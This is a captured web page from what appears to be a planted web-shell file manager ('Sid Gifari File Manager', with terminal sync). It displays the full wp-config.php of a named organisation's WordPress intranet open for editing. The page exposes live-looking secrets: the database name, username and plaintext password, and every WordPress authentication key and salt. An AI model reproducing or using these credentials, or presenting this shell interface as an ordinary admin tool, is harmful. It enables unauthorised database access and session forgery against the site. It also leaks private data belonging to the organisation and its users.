Sid Gifari File Manager
🏠 Root
/
home
/
alianzatejedoras
/
intranet.alianzatejedorasdevida.org
/
📝 Editing: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'alianzatejedoras_intra' ); /** Database username */ define( 'DB_USER', 'alianzatejedoras_intra' ); /** Database password */ define( 'DB_PASSWORD', 'a2531538A@' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'GQjFQl^Pg}_kB6]8PZnJr hbIB^:# |=tUo9>-00FN5DcuUB>;{8z4<,qj`/O.Hm' ); define( 'SECURE_AUTH_KEY', 'BCqc60|K:Jx2RU&o-OTfl,@mi]d<J_aA+T3]]w0Ue1*;:H)v&<g2O1{S>QxJR_k<' ); define( 'LOGGED_IN_KEY', 'rrY#XA!z(Iq^26u?N#=GRI@3N1p88[X@GdAFgrkKl@zG3qt4n;{o$|iAF^Wg])5}' ); define( 'NONCE_KEY', 'B^%qaV>S6&N+c8!]bTn`h uWExd385#@d 4:jMA7.<dDlI>7PvSXV!)L]Kxr6q}]' ); define( 'AUTH_SALT', '?.V[^kD;pgRyGD(T6X;F++w}.oW/Y&OP|sM^SSDyE=+R%s8@Jp[`[71c?.Nzj!H}' ); define( 'SECURE_AUTH_SALT', '-]dN s/)u=y{|;I4{N-TqEE7D[%_b}3aSABB!@5EhfQ/rySirc`ULbEjt5,>:D5|' ); define( 'LOGGED_IN_SALT', '^N$?s,R)ne6sw IH(s>:4bjy(#wozga2/WZ8Ksc3|7i@NxA.]M7]4R+%S-MQ952G' ); define( 'NONCE_SALT', 'emjW@{V>12;U#s-5I!Lbv/>|ic`Xq6o@ccO(~kjNTx/e7&qB9.79WiAS9h`)?88C' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'intra_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
💾 Save
❌ Cancel
Sid Gifari File Manager v1.0 | Terminal Auto-Sync Enabled | Current Path: /home/alianzatejedoras/intranet.alianzatejedorasdevida.org